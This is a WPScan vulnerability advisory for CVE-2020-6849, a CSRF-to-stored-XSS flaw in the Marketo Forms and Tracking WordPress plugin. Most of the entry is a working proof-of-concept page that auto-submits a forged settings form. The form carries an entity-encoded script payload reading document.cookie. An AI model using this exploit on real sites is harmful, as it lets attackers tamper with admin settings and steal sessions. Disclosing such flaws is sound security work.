Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS



Description
Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF.
Proof of Concept
<html>
<form action="https://[WP]/wp-admin/admin.php?page=marketo_fat" method="POST" id="csrf">
    <input type="text" name="marketo_save" value="true">
    <input type="text" name="marketo[marketo_id]" value="&#x22;&#x3E;&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;">
    <input type="text" name="marketo[marketo_base_url]" value="">
    <input type="text" name="marketo[user_id]" value="">
    <input type="text" name="marketo[end_point]" value="">
    <input type="text" name="marketo[secret]" value="">
    <input type="text" name="marketo[popout_title]" value="">
    <input type="text" name="marketo[popout_tabtext]" value="">
    <input type="text" name="marketo[popout_snippet]" value="">
    <input type="text" name="marketo[popout_form]" value="">
</form>
<script>
    document.getElementById('csrf').submit();
</script>
</html>

Affects Plugin

References

CVE 2020-6849
URL https://zeroauth.ltd/blog/2020/01/17/cve-2020-6849-marketo-forms-and-tracking-wordpress-plugin-vulnerable-to-csrf-leading-to-xss-attack/

Classification

Type MULTI

Miscellaneous

Original Researcher Zeroauth
Views 3859
Verified No
WPVDB ID 10031

Timeline

Publicly Published 2020-01-17 (about 1 month ago)
Added 2020-01-18 (about 1 month ago)
Last Updated 2020-01-19 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin